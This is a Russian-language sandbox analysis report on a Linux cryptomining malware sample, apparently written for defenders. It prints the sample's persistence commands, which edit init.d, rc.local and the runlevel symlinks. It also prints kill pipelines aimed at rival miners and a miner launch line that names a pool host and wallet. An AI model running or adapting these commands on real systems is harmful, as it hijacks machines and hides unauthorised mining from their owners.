Техническая информация
Для обеспечения автоматического запуска и распространения:
Создает или модифицирует следующие файлы:
- /etc/init.d/<SAMPLE>
- /etc/rc.local
Создает или модифицирует символические ссылки (симлинки):
- /etc/rc3.d/S01<SAMPLE>
- /etc/rc4.d/S01<SAMPLE>
Вредоносные функции:
Запускает себя в качестве демона
Запускает процессы:
- sh -c ln -s /etc/init.d/<SAMPLE> /etc/rc3.d/S01<SAMPLE>
- ln -s /etc/init.d/<SAMPLE> /etc/rc3.d/S01<SAMPLE>
- sh -c ln -s /etc/init.d/<SAMPLE> /etc/rc4.d/S01<SAMPLE>
- ln -s /etc/init.d/<SAMPLE> /etc/rc4.d/S01<SAMPLE>
- sh -c ln -s /etc/init.d/<SAMPLE> /etc/rc.d/rc.3S01<SAMPLE>
- ln -s /etc/init.d/<SAMPLE> /etc/rc.d/rc.3S01<SAMPLE>
- sh -c sed -i -e '/exit/d' /etc/rc.local
- sed -i -e /exit/d /etc/rc.local
- sh -c sed -i -e '/
- sed -i -e /
- sh -c sed -i -e '//<SAMPLE> reboot/d' /etc/rc.local
- sed -i -e //<SAMPLE> reboot/d /etc/rc.local
- sh -c sed -i -e '2 i//<SAMPLE> reboot' /etc/rc.local
- sed -i -e 2 i//<SAMPLE> reboot /etc/rc.local
- sh -c sed -i -e '2 i//<SAMPLE> reboot start' /etc/rc.d/rc.local
- sed -i -e 2 i//<SAMPLE> reboot start /etc/rc.d/rc.local
- sh -c sed -i -e '2 i//<SAMPLE> reboot start' /etc/init.d/boot.local
- sed -i -e 2 i//<SAMPLE> reboot start /etc/init.d/boot.local
- sh -c pkill -f xmrig
- pkill -f xmrig
- sh -c pkill -f mine
- pkill -f mine
- sh -c pkill -f thisxxs
- pkill -f thisxxs
- sh -c ps auxf|grep -v grep|grep 3333|awk '{print $2}'|xargs kill -9
- ps auxf
- grep -v grep
- grep 3333
- awk {print $2}
- xargs kill -9
- kill -9
- sh -c ps auxf|grep -v grep|grep xmr|awk '{print $2}'|xargs kill -9
- grep xmr
- sh -c ps auxf|grep -v grep|grep mine|awk '{print $2}'|xargs kill -9
- grep mine
- sh -c ps auxf|grep -v grep|grep pool|awk '{print $2}'|xargs kill -9
- grep pool
- sh -c ps auxf|grep -v grep|grep 4444|awk '{print $2}'|xargs kill -9
- grep 4444
- sh -c ps auxf|grep -v grep|grep 1444|awk '{print $2}'|xargs kill -9
- grep 1444
- sh -c ps auxf|grep -v grep|grep 5555|awk '{print $2}'|xargs kill -9
- grep 5555
- sh -c ps auxf|grep -v grep|grep -p x|awk '{print $2}'|xargs kill -9
- grep -p x
- sh -c ./tmp/thisxxs -B -o stratum+tcp://mine.ppxxmr.com:3333 -u 48gM3TSMCeufGf14Ug6XdRN1r8YAg8rh7TFBkh5iz3uSJujperZnPjpVQMNjMydFjaYEqpsc8Dd9T7w9Lfi6bvjkMcvKzxU -p x -k
- ./tmp/thisxxs -B -o stratum+tcp://mine.ppxxmr.com:3333 -u 48gM3TSMCeufGf14Ug6XdRN1r8YAg8rh7TFBkh5iz3uSJujperZnPjpVQMNjMydFjaYEqpsc8Dd9T7w9Lfi6bvjkMcvKzxU -p x -k
- sh -c ps -ef|grep thisxxs
- ps -ef
- grep thisxxs
Завершает следующие процессы:
- /bin/sh
- /tmp/thisxxs
Выполняет операции с файловой системой:
Модифицирует права доступа к файлам:
- /etc/sed0YIOeG
- /etc/sedfAv645
Создает или модифицирует файлы:
- /etc/resolv.conf
- /etc/sed0YIOeG
- /etc/sedfLjxSS
- /etc/sedfAv645
- /tmp/thisxxs
Удаляет файлы:
- /bin/wipefs
Сетевая активность:
Устанавливает соединение:
- <LOCAL_DNS_SERVER>
- 61.###.247.87:3333
DNS ASK:
- mi##.ppxxmr.com
Посылает данные следующим серверам:
- 61.###.247.87:3333
Получает данные от следующих серверов:
- 61.###.247.87:3333
Прочее:
Собирает информацию о CPU
Собирает информацию об оперативной памяти
Собирает информацию о сетевой активности
